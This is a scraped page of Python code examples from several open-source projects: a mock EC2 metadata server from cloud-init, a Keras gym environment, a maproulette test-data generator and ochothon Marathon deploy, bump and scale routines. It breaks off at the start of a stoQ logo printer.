Source File: mock-meta.py
View license
    def get_data(self, params, who, **kwargs):
        """Serve a mock EC2-style metadata response.

        params -- list of path components below the metadata root;
                  params[0] selects the action, the rest are sub-parameters.
        who    -- the caller's hostname, echoed back for hostname actions.
        kwargs -- optional 'client_ip', echoed back for the ipv4 actions
                  (defaults to '10.0.0.1').

        Returns the response body as a string.  Raises WebException with
        BAD_REQUEST when a public-keys index is not a valid integer or is
        out of range.
        """
        if not params:
            # Show the root level capabilities when
            # no params are passed...
            caps = sorted(META_CAPABILITIES)
            return "\n".join(caps)
        action = params[0].lower()
        if action == 'instance-id':
            return 'i-%s' % (id_generator(lower=True))
        elif action == 'ami-launch-index':
            return "%s" % random.choice([0, 1, 2, 3])
        elif action == 'aki-id':
            return 'aki-%s' % (id_generator(lower=True))
        elif action == 'ami-id':
            return 'ami-%s' % (id_generator(lower=True))
        elif action == 'ari-id':
            return 'ari-%s' % (id_generator(lower=True))
        elif action == 'block-device-mapping':
            nparams = params[1:]
            if not nparams:
                return "\n".join(BLOCK_DEVS)
            subvalue = traverse(nparams, DEV_MAPPINGS)
            if not subvalue:
                # Unknown sub-path: list the known mappings instead.
                return "\n".join(sorted(list(DEV_MAPPINGS.keys())))
            return str(subvalue)
        elif action in ['hostname', 'local-hostname', 'public-hostname']:
            # Just echo back their own hostname that they called in on.
            return "%s" % (who)
        elif action == 'instance-type':
            return random.choice(INSTANCE_TYPES)
        elif action == 'ami-manifest-path':
            return 'my-amis/spamd-image.manifest.xml'
        elif action == 'security-groups':
            return 'default'
        elif action in ['local-ipv4', 'public-ipv4']:
            # Just echo back their own ip that they called in on...
            return "%s" % (kwargs.get('client_ip', '10.0.0.1'))
        elif action == 'reservation-id':
            return "r-%s" % (id_generator(lower=True))
        elif action == 'product-codes':
            return "%s" % (id_generator(size=8))
        elif action == 'public-keys':
            nparams = params[1:]
            # This is a weird kludge, why amazon why!!!
            # public-keys is messed up: a listing of
            # /latest/meta-data/public-keys/ shows something like
            # '0=brickies', but a GET to
            # /latest/meta-data/public-keys/0=brickies will fail; you have
            # to know to GET '/latest/meta-data/public-keys/0', and from
            # there you get an 'openssh-key', which you can GET.
            # This hunk of code just re-works the object for that.
            avail_keys = get_ssh_keys()
            key_ids = sorted(list(avail_keys.keys()))
            if nparams:
                mybe_key = nparams[0]
                try:
                    key_id = int(mybe_key)
                    key_name = key_ids[key_id]
                except (ValueError, IndexError):
                    # Narrowed from a bare 'except:' so unrelated failures
                    # (KeyboardInterrupt, programming errors) aren't masked;
                    # int() raises ValueError, list indexing IndexError.
                    raise WebException(httplib.BAD_REQUEST,
                                       "Unknown key id %r" % mybe_key)
                # Extract the possible sub-params
                result = traverse(nparams[1:], {
                    "openssh-key": "\n".join(avail_keys[key_name]),
                })
                if isinstance(result, dict):
                    # TODO(harlowja): This might not be right??
                    result = "\n".join(sorted(result.keys()))
                if not result:
                    result = ''
                return result
            else:
                # No index given: list the keys as 'index=name' lines.
                contents = []
                for (i, key_id) in enumerate(key_ids):
                    contents.append("%s=%s" % (i, key_id))
                return "\n".join(contents)
        elif action == 'placement':
            nparams = params[1:]
            if not nparams:
                pcaps = sorted(PLACEMENT_CAPABILITIES.keys())
                return "\n".join(pcaps)
            pentry = nparams[0].strip().lower()
            if pentry == 'availability-zone':
                zones = PLACEMENT_CAPABILITIES[pentry]
                return "%s" % random.choice(zones)
            return "%s" % (PLACEMENT_CAPABILITIES.get(pentry, ''))
        else:
            log.warn(("Did not implement action %s, "
                      "returning empty response: %r"),
                     action, NOT_IMPL_RESPONSE)
            return NOT_IMPL_RESPONSE

Example 32

Project: cloud-init
Source File: mock-meta.py
View license
    def get_data(self, params, who, **kwargs):
        """Serve a mock EC2-style metadata response.

        params -- list of path components below the metadata root;
                  params[0] selects the action, the rest are sub-parameters.
        who    -- the caller's hostname, echoed back for hostname actions.
        kwargs -- optional 'client_ip', echoed back for the ipv4 actions
                  (defaults to '10.0.0.1').

        Returns the response body as a string.  Raises WebException with
        BAD_REQUEST when a public-keys index is not a valid integer or is
        out of range.
        """
        if not params:
            # Show the root level capabilities when
            # no params are passed...
            caps = sorted(META_CAPABILITIES)
            return "\n".join(caps)
        action = params[0].lower()
        if action == 'instance-id':
            return 'i-%s' % (id_generator(lower=True))
        elif action == 'ami-launch-index':
            return "%s" % random.choice([0, 1, 2, 3])
        elif action == 'aki-id':
            return 'aki-%s' % (id_generator(lower=True))
        elif action == 'ami-id':
            return 'ami-%s' % (id_generator(lower=True))
        elif action == 'ari-id':
            return 'ari-%s' % (id_generator(lower=True))
        elif action == 'block-device-mapping':
            nparams = params[1:]
            if not nparams:
                return "\n".join(BLOCK_DEVS)
            subvalue = traverse(nparams, DEV_MAPPINGS)
            if not subvalue:
                # Unknown sub-path: list the known mappings instead.
                return "\n".join(sorted(list(DEV_MAPPINGS.keys())))
            return str(subvalue)
        elif action in ['hostname', 'local-hostname', 'public-hostname']:
            # Just echo back their own hostname that they called in on.
            return "%s" % (who)
        elif action == 'instance-type':
            return random.choice(INSTANCE_TYPES)
        elif action == 'ami-manifest-path':
            return 'my-amis/spamd-image.manifest.xml'
        elif action == 'security-groups':
            return 'default'
        elif action in ['local-ipv4', 'public-ipv4']:
            # Just echo back their own ip that they called in on...
            return "%s" % (kwargs.get('client_ip', '10.0.0.1'))
        elif action == 'reservation-id':
            return "r-%s" % (id_generator(lower=True))
        elif action == 'product-codes':
            return "%s" % (id_generator(size=8))
        elif action == 'public-keys':
            nparams = params[1:]
            # This is a weird kludge, why amazon why!!!
            # public-keys is messed up: a listing of
            # /latest/meta-data/public-keys/ shows something like
            # '0=brickies', but a GET to
            # /latest/meta-data/public-keys/0=brickies will fail; you have
            # to know to GET '/latest/meta-data/public-keys/0', and from
            # there you get an 'openssh-key', which you can GET.
            # This hunk of code just re-works the object for that.
            avail_keys = get_ssh_keys()
            key_ids = sorted(list(avail_keys.keys()))
            if nparams:
                mybe_key = nparams[0]
                try:
                    key_id = int(mybe_key)
                    key_name = key_ids[key_id]
                except (ValueError, IndexError):
                    # Narrowed from a bare 'except:' so unrelated failures
                    # (KeyboardInterrupt, programming errors) aren't masked;
                    # int() raises ValueError, list indexing IndexError.
                    raise WebException(httplib.BAD_REQUEST,
                                       "Unknown key id %r" % mybe_key)
                # Extract the possible sub-params
                result = traverse(nparams[1:], {
                    "openssh-key": "\n".join(avail_keys[key_name]),
                })
                if isinstance(result, dict):
                    # TODO(harlowja): This might not be right??
                    result = "\n".join(sorted(result.keys()))
                if not result:
                    result = ''
                return result
            else:
                # No index given: list the keys as 'index=name' lines.
                contents = []
                for (i, key_id) in enumerate(key_ids):
                    contents.append("%s=%s" % (i, key_id))
                return "\n".join(contents)
        elif action == 'placement':
            nparams = params[1:]
            if not nparams:
                pcaps = sorted(PLACEMENT_CAPABILITIES.keys())
                return "\n".join(pcaps)
            pentry = nparams[0].strip().lower()
            if pentry == 'availability-zone':
                zones = PLACEMENT_CAPABILITIES[pentry]
                return "%s" % random.choice(zones)
            return "%s" % (PLACEMENT_CAPABILITIES.get(pentry, ''))
        else:
            log.warn(("Did not implement action %s, "
                      "returning empty response: %r"),
                     action, NOT_IMPL_RESPONSE)
            return NOT_IMPL_RESPONSE

Example 33

Project: gym
Source File: convergence.py
View license
    def _reset(self):
        """Build and compile a randomly-architected Keras classifier on a
        freshly mixed dataset, reset training bookkeeping, and return the
        initial observation.

        The sampled architecture sizes (convAsz, convBsz, densesz), the
        compiled model, the data split, the SGD optimizer and the shared
        regularizer are all stored on self.

        NOTE(review): do not reorder the random.choice calls below -- the
        sequence of draws from the shared RNG is part of this method's
        observable behavior.
        """
        reg = WeightRegularizer()

        # a hack to make regularization variable: keeping l1/l2 as backend
        # variables allows them to be changed later without recompiling
        reg.l1 = K.variable(0.0)
        reg.l2 = K.variable(0.0)


        data, nb_classes = self.data_mix()
        X, Y, Xv, Yv = data

        # input square image dimensions
        img_rows, img_cols = X.shape[-1], X.shape[-1]
        img_channels = X.shape[1]
        # save number of classes and instances
        self.nb_classes = nb_classes
        self.nb_inst = len(X)

        # convert class vectors to binary class matrices
        Y = np_utils.to_categorical(Y, nb_classes)
        Yv = np_utils.to_categorical(Yv, nb_classes)

        # here definition of the model happens
        model = Sequential()

        # 'True' appears twice for an increased (2 in 3) probability of
        # including the convolutional stack
        if random.choice([True, True, False]):

            # Choose convolution #1
            self.convAsz = random.choice([32,64,128])

            model.add(Convolution2D(self.convAsz, 3, 3, border_mode='same',
                                    input_shape=(img_channels, img_rows, img_cols),
                                    W_regularizer = reg,
                                    b_regularizer = reg))
            model.add(Activation('relu'))

            model.add(Convolution2D(self.convAsz, 3, 3,
                                    W_regularizer = reg,
                                    b_regularizer = reg))
            model.add(Activation('relu'))

            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.25))

            # Choose convolution size B (0 means the second conv block is
            # skipped entirely)
            self.convBsz = random.choice([0,32,64])

            if self.convBsz > 0:
                model.add(Convolution2D(self.convBsz, 3, 3, border_mode='same',
                                        W_regularizer = reg,
                                        b_regularizer = reg))
                model.add(Activation('relu'))

                model.add(Convolution2D(self.convBsz, 3, 3,
                                        W_regularizer = reg,
                                        b_regularizer = reg))
                model.add(Activation('relu'))

                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

            model.add(Flatten())

        else:
            # Pure MLP path: no convolutions, flatten the raw image
            model.add(Flatten(input_shape=(img_channels, img_rows, img_cols)))
            self.convAsz = 0
            self.convBsz = 0

        # choose fully connected layer size
        self.densesz = random.choice([256,512,762])

        model.add(Dense(self.densesz,
                                W_regularizer = reg,
                                b_regularizer = reg))
        model.add(Activation('relu'))
        model.add(Dropout(0.5))

        model.add(Dense(nb_classes,
                                W_regularizer = reg,
                                b_regularizer = reg))
        model.add(Activation('softmax'))

        # let's train the model using SGD + momentum (how original).
        sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(loss='categorical_crossentropy',
                      optimizer=sgd,
                      metrics=['accuracy'])

        # scale pixel values to [0, 1]
        X = X.astype('float32')
        Xv = Xv.astype('float32')
        X /= 255
        Xv /= 255

        self.data = (X,Y,Xv,Yv)
        self.model = model
        self.sgd = sgd

        # initial accuracy values
        self.best_val = 0.0
        self.previous_acc = 0.0

        self.reg = reg
        self.epoch_idx = 0

        return self._get_obs()

Example 34

Project: maproulette
Source File: manage.py
View license
@manager.command
def create_testdata(challenges=10, tasks=100, users=10):
    """Populate the database with randomized test data.

    Deletes any existing users, challenges, tasks, geometries and actions,
    then creates ``users`` test users, ``challenges`` challenges and
    ``tasks`` tasks per challenge. The arguments may arrive as strings from
    the CLI runner, hence the int() casts throughout.

    NOTE(review): Python 2 code (print statements) — do not run under 3.x.
    """
    import uuid
    import random
    from maproulette import db
    from maproulette.models import User, Challenge, Task, TaskGeometry, Action
    from shapely.geometry import Point, LineString, box

    # task statuses randomly assigned to the generated tasks via Action rows
    statuses = ['available',
                'skipped',
                'fixed',
                'deleted',
                'alreadyfixed',
                'falsepositive']

    # challenge default strings
    challenge_help_test = "Sample challenge *help* text"
    challenge_instruction_test = "Challenge instruction text"
    task_instruction_text = "Task instruction text"

    # delete old tasks and challenges (children first, to satisfy FK order)
    db.session.query(TaskGeometry).delete()
    db.session.query(Action).delete()
    db.session.query(Task).delete()
    db.session.query(Challenge).delete()
    db.session.query(User).delete()
    db.session.commit()

    # create users with sequential ids and predictable display names
    for uid in range(int(users)):
        user = User()
        user.id = uid
        user.display_name = 'Test User {uid}'.format(uid=uid)
        db.session.add(user)
    db.session.commit()

    # create the requested number of challenges (ids are 1-based)
    for i in range(1, int(challenges) + 1):
        print "Generating Test Challenge #%d" % i
        minx = -120
        maxx = -40
        miny = 20
        maxy = 50
        challengepoly = None
        slug = "test%d" % i
        title = "Test Challenge %d" % i
        challenge = Challenge(slug, title)
        challenge.difficulty = random.choice([1, 2, 3])
        challenge.active = True
        challenge.blurb = "This is test challenge number %d" % i
        challenge.description = "This describes challenge %d in detail" % i
        challenge.help = challenge_help_test
        challenge.instruction = challenge_instruction_test
        # have bounding boxes for all but the first two challenges.
        if i > 2:
            # random 1x1 degree box somewhere over North America; the task
            # point generation below stays inside these bounds
            minx = random.randrange(-120, -40)
            miny = random.randrange(20, 50)
            maxx = minx + 1
            maxy = miny + 1
            challengepoly = box(minx, miny, maxx, maxy)
            print "\tChallenge has a bounding box of ", challengepoly
            challenge.polygon = challengepoly
        db.session.add(challenge)

        # add some tasks to the challenge
        print "\tGenerating %i tasks for challenge %i" % (int(tasks), i)
        # generate NUM_TASKS random tasks
        for j in range(int(tasks)):
            # generate a unique identifier
            identifier = str(uuid.uuid4())
            # create two random points not too far apart (second point is
            # within ~0.01 degrees of the first, in a random direction)
            task_geometries = []
            p1 = Point(
                random.randrange(minx, maxx) + random.random(),
                random.randrange(miny, maxy) + random.random())
            p2 = Point(
                p1.x + (random.random() * random.choice((1, -1)) * 0.01),
                p1.y + (random.random() * random.choice((1, -1)) * 0.01))
            # create a linestring connecting the two points
            # no constructor for linestring from points?
            l1 = LineString([(p1.x, p1.y), (p2.x, p2.y)])
            # add the first point and the linestring to the task's geometries
            task_geometries.append(TaskGeometry(p1))
            # set a linestring for every other challenge
            if not j % 2:
                task_geometries.append(TaskGeometry(l1))
            # instantiate the task and register it with challenge 'test'
            # Initialize a task with its challenge slug and persistent ID
            task = Task(challenge.slug, identifier, task_geometries)
            # because we are not using the API, we need to call set_location
            # explicitly to set the task's location
            task.set_location()
            # generate random string for the instruction
            task.instruction = task_instruction_text
            # set a status and attribute it to a random existing user
            action = Action(random.choice(statuses),
                            user_id=random.choice(range(int(users))))
            task.append_action(action)
            # add the task to the session
            db.session.add(task)

    # commit the generated tasks and the challenge to the database.
    db.session.commit()

Example 35

Project: ochothon
Source File: bump.py
View license
    def run(self):
        """Bump every pod in the cluster to docker image version self.version.

        Workflow: resolve the single marathon application backing
        self.cluster, fetch its most recent configuration, kill all pods,
        PUT the configuration back with the image tag rewritten to
        self.version (marathon then restarts the tasks), and wait for the
        new pods to reach the target state. Results land in self.out
        ('up', 'ok'); failures are logged, not raised.
        """
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            # - they should all map to one single marathon application (abort if not)
            # - we'll use the application identifier to retrieve the configuration json later on
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [hints['application'] for (_, hints, _) in replies.values()]

            js = run(self.proxy, _query)
            assert len(set(js)) == 1, '%s is mapping to 2+ marathon applications' % self.cluster
            app = js[0]

            #
            # - fetch the various versions for our app
            # - we want to get hold of the most recent configuration
            #
            url = 'http://%s/v2/apps/%s/versions' % (master, app)
            reply = get(url, headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            # fixed assert message: this is a GET, not a delete
            assert code == 200 or code == 201, 'fetch failed (HTTP %d)' % code
            js = reply.json()

            #
            # - retrieve the latest one
            # - keep the docker container configuration and the # of tasks around
            #
            last = js['versions'][0]
            url = 'http://%s/v2/apps/%s/versions/%s' % (master, app, last)
            reply = get(url, headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            # fixed assert message: this is a GET, not a delete
            assert code == 200 or code == 201, 'fetch failed (HTTP %d)' % code
            js = reply.json()

            spec = js['container']
            tag = spec['docker']['image']
            capacity = js['instances']

            #
            # - kill all the pods using a POST /control/kill
            # - wait for them to be dead
            #
            @retry(timeout=self.timeout, pause=0)
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'control/kill', timeout=self.timeout)
                    return [(code, seq) for seq, _, code in replies.values()]

                #
                # - fire the request one or more pods
                # - wait for every pod to report back a HTTP 410 (GONE)
                # - this means the ochopod state-machine is now idling (e.g dead)
                #
                js = run(self.proxy, _query)
                gone = sum(1 for code, _ in js if code == 410)
                assert gone == len(js), 'at least one pod is still running'
                return

            _spin()

            #
            # - grab the docker image
            # - just add a :<version> suffix (or replace it) but don't change the image  proper
            # - update the image and PUT the new configuration back
            # - marathon will then kill & re-start all the tasks
            #
            tokens = tag.split(':')
            spec['docker']['image'] = \
                '%s:%s' % (tag, self.version) if len(tokens) < 2 else '%s:%s' % (tokens[0], self.version)
            js = \
                {
                    'container': spec
                }

            url = 'http://%s/v2/apps/%s' % (master, app)
            reply = put(url, data=json.dumps(js), headers=headers)
            code = reply.status_code
            logger.debug('-> %s (HTTP %d)' % (url, code))
            logger.debug(reply.text)
            assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

            #
            # - the pods should now be starting
            # - wait for all the pods to be in the 'running' mode (they are 'dead' right now)
            # - the sequence counters allocated to our new pods are returned as well
            #
            target = ['running'] if self.strict else ['stopped', 'running']
            @retry(timeout=self.timeout, pause=3, default={})
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'info')
                    return [(hints['process'], seq) for seq, hints, _ in replies.values() if hints['process'] in target]

                js = run(self.proxy, _query)
                assert len(js) == capacity, 'not all pods running yet'
                return js

            js = _spin()
            up = [seq for _, seq in js]
            assert len(up) == capacity, '1+ pods still not up (%d/%d)' % (len(up), capacity)
            self.out['up'] = up
            self.out['ok'] = True

            logger.debug('%s : %d pods updated to version "%s"' % (self.cluster, capacity, self.version))

        except AssertionError as failure:

            logger.debug('%s : failed to bump -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to bump -> %s' % (self.cluster, diagnostic(failure)))

Example 36

Project: ochothon
Source File: deploy.py
View license
    def run(self):
        """Deploy a new marathon application from a YAML pod template.

        Parses self.template, merges it over defaults (and any -o
        overrides keyed by the qualified cluster name), builds the
        marathon application spec (docker container, ports, env) and
        POSTs it to a randomly picked marathon master. Then waits for
        self.pods pods to reach the target state; if none come up the
        application is deleted again. Results land in self.out
        ('up', 'ok'); failures are logged, not raised.
        """
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            with open(self.template, 'r') as f:

                #
                # - parse the template yaml file (e.g container definition)
                # - NOTE(review): yaml.load without an explicit SafeLoader will
                #   construct arbitrary python objects — fine for trusted
                #   templates, unsafe on untrusted input (consider yaml.safe_load)
                #
                raw = yaml.load(f)
                assert raw, 'empty YAML input (user error ?)'

                #
                # - merge with our defaults
                # - we want at least the cluster & image settings
                # - TCP 8080 is added by default to the port list
                #
                defaults = \
                    {
                        'start': True,
                        'debug': False,
                        'settings': {},
                        'ports': [8080],
                        'verbatim': {}
                    }

                cfg = merge(defaults, raw)
                assert 'cluster' in cfg, 'cluster identifier undefined (user error ?)'
                assert 'image' in cfg, 'docker image undefined (user error ?)'

                #
                # - if a suffix is specified append it to the cluster identifier
                #
                if self.suffix:
                    cfg['cluster'] = '%s-%s' % (cfg['cluster'], self.suffix)

                #
                # - timestamp the application (we really want a new uniquely identified application)
                # - lookup the optional overrides and merge with our pod settings if specified
                # - this is what happens when the -o option is used
                #
                stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = '%s.%s' % (self.namespace, cfg['cluster'])
                application = 'ochopod.%s-%s' % (qualified, stamp)
                if qualified in self.overrides:

                    blk = self.overrides[qualified]
                    logger.debug('%s : overriding %d settings (%s)' % (self.template, len(blk), qualified))
                    cfg['settings'] = merge(cfg['settings'], blk)

                def _nullcheck(cfg, prefix):

                    #
                    # - walk through the settings and flag any null value
                    #
                    missing = []
                    if cfg is not None:
                        for key, value in cfg.items():
                            if value is None:
                                missing += ['%s.%s' % ('.'.join(prefix), key)]
                            elif isinstance(value, dict):
                                missing += _nullcheck(value, prefix + [key])

                    return missing

                missing = _nullcheck(cfg['settings'], ['pod'])
                assert not missing, '%d setting(s) missing ->\n\t - %s' % (len(missing), '\n\t - '.join(missing))

                #
                # - if we still have no target default it to 1 single pod
                #
                if not self.pods:
                    self.pods = 1

                #
                # - setup our port list
                # - the port binding is specified either by an integer (container port -> dynamic mesos port), by
                #   two integers (container port -> host port) or by an integer followed by a * (container port ->
                #   same port on the host)
                # - on top of that, all those options allow to specify whether the protocol is TCP or UDP by adding
                #   the desired protocol after the binding (e.g. '8080 tcp' or '8125 * udp'. TCP is the default if no
                #   protocol is specified.
                # - the marathon pods must by design map /etc/mesos
                #
                def _parse_port(token):

                    #
                    # - tries to return an int if possible, a string otherwise
                    #
                    def get_token_no_protocol(token):
                        # - remove the protocol piece
                        t = token[:-4].strip()
                        try:
                            return int(t)
                        except ValueError:
                            return t

                    if isinstance(token, str) and token.lower().endswith(' udp'):
                        protocol = 'udp'
                        token_no_protocol = get_token_no_protocol(token)

                    elif isinstance(token, str) and token.lower().endswith(' tcp'):
                        protocol = 'tcp'
                        token_no_protocol = get_token_no_protocol(token)
                    else:
                        # - TCP is the default
                        protocol = 'tcp'
                        token_no_protocol = token

                    if isinstance(token_no_protocol, int):
                        return {'containerPort': token_no_protocol, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str) and token_no_protocol.endswith(' *'):
                        port = int(token_no_protocol[:-2])
                        return {'containerPort': port, 'hostPort': port, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str):
                        ports = token_no_protocol.split(' ')
                        assert len(ports) == 2, 'invalid port syntax (must be two integers separated by 1+ spaces optionally followed by the protocol (tcp or udp, defaults to tcp))'
                        return {'containerPort': int(ports[0]), 'hostPort': int(ports[1]), 'protocol': protocol}
                    else:
                        assert 0, 'invalid port syntax ("%s")' % token

                #
                # - craft the docker image specifier
                # - if -r is used make sure to add (or override) the :<label> suffix
                #
                image = cfg['image']
                tokens = image.split(':')
                image = '%s:%s' % (tokens[0], self.release) if self.release else image

                #
                # - note the marathon-ec2 ochopod bindings will set the application hint automatically
                #   via environment variable (e.g no need to specify it here)
                # - make sure to mount /etc/mesos and /opt/mesosphere to account for various mesos installs
                #
                ports = [_parse_port(token) for token in cfg['ports']] if 'ports' in cfg else []
                spec = \
                    {
                        'id': application,
                        'instances': self.pods,
                        'env':
                            {
                                'ochopod_cluster': cfg['cluster'],
                                'ochopod_debug': str(cfg['debug']).lower(),
                                'ochopod_start': str(cfg['start']).lower(),
                                'ochopod_namespace': self.namespace,
                                'pod': json.dumps(cfg['settings'])
                            },
                        'container':
                            {
                                'type': 'DOCKER',
                                'docker':
                                    {
                                        'forcePullImage': True,
                                        'image': image,
                                        'network': 'BRIDGE',
                                        'portMappings': ports
                                    },
                                'volumes':
                                    [
                                        {
                                            'containerPath': '/etc/mesos',
                                            'hostPath': '/etc/mesos',
                                            'mode': 'RO'
                                        },
                                        {
                                            'containerPath': '/opt/mesosphere',
                                            'hostPath': '/opt/mesosphere',
                                            'mode': 'RO'
                                        }
                                    ]
                            }
                    }

                #
                # - if we have a 'verbatim' block in our image definition yaml, merge it now
                #
                if 'verbatim' in cfg:
                    spec = merge(cfg['verbatim'], spec)

                #
                # - pick a marathon master at random
                # - fire the POST /v2/apps to create our application
                # - this will indirectly spawn our pods
                #
                url = 'http://%s/v2/apps' % master
                reply = post(url, data=json.dumps(spec), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

                #
                # - wait for all the pods to be in the 'running' mode
                # - the 'application' hint is set by design to the marathon application identifier
                # - the sequence counters allocated to our new pods are returned as well
                #
                target = ['dead', 'running'] if self.strict else ['dead', 'stopped', 'running']
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, qualified, 'info')
                        return [(hints['process'], seq) for seq, hints, _ in replies.values()
                                if hints['application'] == application and hints['process'] in target]

                    js = run(self.proxy, _query)
                    assert len(js) == self.pods, 'not all pods running yet'
                    return js

                js = _spin()
                # bug fix: the original used "state is not 'dead'" which compares
                # string identity (works only by CPython interning accident) —
                # use value inequality instead
                running = sum(1 for state, _ in js if state != 'dead')
                up = [seq for _, seq in js]
                self.out['up'] = up
                self.out['ok'] = self.pods == running
                logger.debug('%s : %d/%d pods are running ' % (self.template, running, self.pods))

                if not up:

                    #
                    # - nothing is running (typically because the image has an issue and is not
                    #   not booting the ochopod script for instance, which happens often)
                    # - in that case fire a HTTP DELETE against the marathon application to clean it up
                    #
                    url = 'http://%s/v2/apps/%s' % (master, application)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))

Example 37

Project: ochothon
Source File: scale.py
View license
    def run(self):
        """Scale the cluster's marathon application up or down.

        self.factor is '@n' (absolute pod target) or 'xn' (multiplier on
        the current pod count), clipped to a minimum of 1. Scaling up
        bumps marathon's 'instances' count and waits for the new pods;
        scaling down kills the selected pods via /control/kill and then
        deletes their marathon tasks. The delta and outcome are written
        to self.out; failures are logged, not raised.
        """
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            # - each reply carries (sequence counter, marathon app id, task id)
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [(seq, hints['application'], hints['task']) for (seq, hints, _) in replies.values()]

            #
            # - remap a bit differently and get an ordered list of task identifiers
            # - we'll use that to kill the newest pods
            #
            js = run(self.proxy, _query)
            total = len(js)
            if self.group is not None:

                #
                # - if -g was specify apply the scaling to the underlying marathon application containing that pod
                # - be careful to update the task list and total # of pods
                #
                keys = {seq: key for (seq, key, _) in js}
                assert self.group in keys, '#%d is not a valid pod index' % self.group
                app = keys[self.group]
                # tasks sorted by pod sequence counter (oldest first), limited to this app
                tasks = [(seq, task) for (seq, key, task) in sorted(js, key=(lambda _: _[0])) if key == app]
                total = sum(1 for (_, key, _) in js if key == app)

            else:

                #
                # - check and make sure all our pods map to one single marathon application
                #
                keys = set([key for (_, key, _) in js])
                assert len(keys) == 1, '%s maps to more than one application, you must specify -g' % self.cluster
                tasks = [(seq, task) for (seq, _, task) in sorted(js, key=(lambda _: _[0]))]
                app = keys.pop()

            #
            # - infer the target # of pods based on the user-defined factor
            # - '@' means absolute, 'x' means multiply the current total
            #
            operator = self.factor[0]
            assert operator in ['@', 'x'], 'invalid operator'
            n = float(self.factor[1:])
            target = n if operator == '@' else total * n

            #
            # - clip the target # of pods down to 1
            #
            target = max(1, int(target))
            self.out['delta'] = target - total
            if target > total:

                #
                # - scale the application capacity up
                #
                js = \
                    {
                        'instances': target
                    }

                url = 'http://%s/v2/apps/%s' % (master, app)
                reply = put(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

                #
                # - wait for all our new pods to be there
                #
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, self.cluster, 'info')
                        return [seq for seq, _, _ in replies.values()]

                    js = run(self.proxy, _query)
                    assert len(js) == target, 'not all pods running yet'
                    return js

                _spin()

            elif target < total:

                #
                # - if the fifo switch is on make sure to pick the oldest pods for deletion
                # - otherwise the newest pods (highest sequence counters) are culled
                #
                tasks = tasks[:total - target] if self.fifo else tasks[target:]

                #
                # - kill all (or part of) the pods using a POST /control/kill
                # - wait for them to be dead
                #
                @retry(timeout=self.timeout, pause=0)
                def _spin():
                    def _query(zk):
                        indices = [seq for (seq, _) in tasks]
                        replies = fire(zk, self.cluster, 'control/kill', subset=indices, timeout=self.timeout)
                        return [(code, seq) for seq, _, code in replies.values()]

                    #
                    # - fire the request one or more pods
                    # - wait for every pod to report back a HTTP 410 (GONE)
                    # - this means the ochopod state-machine is now idling (e.g dead)
                    #
                    js = run(self.proxy, _query)
                    gone = sum(1 for code, _ in js if code == 410)
                    assert gone == len(js), 'at least one pod is still running'
                    return

                _spin()

                #
                # - delete all the underlying tasks at once using POST v2/tasks/delete
                # - scale=true tells marathon to shrink 'instances' accordingly
                #
                js = \
                    {
                        'ids': [task for (_, task) in tasks]
                    }

                url = 'http://%s/v2/tasks/delete?scale=true' % master
                reply = post(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, diagnostic(failure)))

Example 38

Project: stoq
Source File: logo.py
View license
def print_logo():
    """Print a randomly chosen ASCII-art stoQ logo to stdout.

    Falls back to logo[3] (the plain 7-bit ASCII variant) if printing the
    chosen art fails — presumably a UnicodeEncodeError on terminals that
    cannot render the box-drawing characters (TODO confirm).
    """

    logo = []

    logo.append("""
    .------..------..------..------.
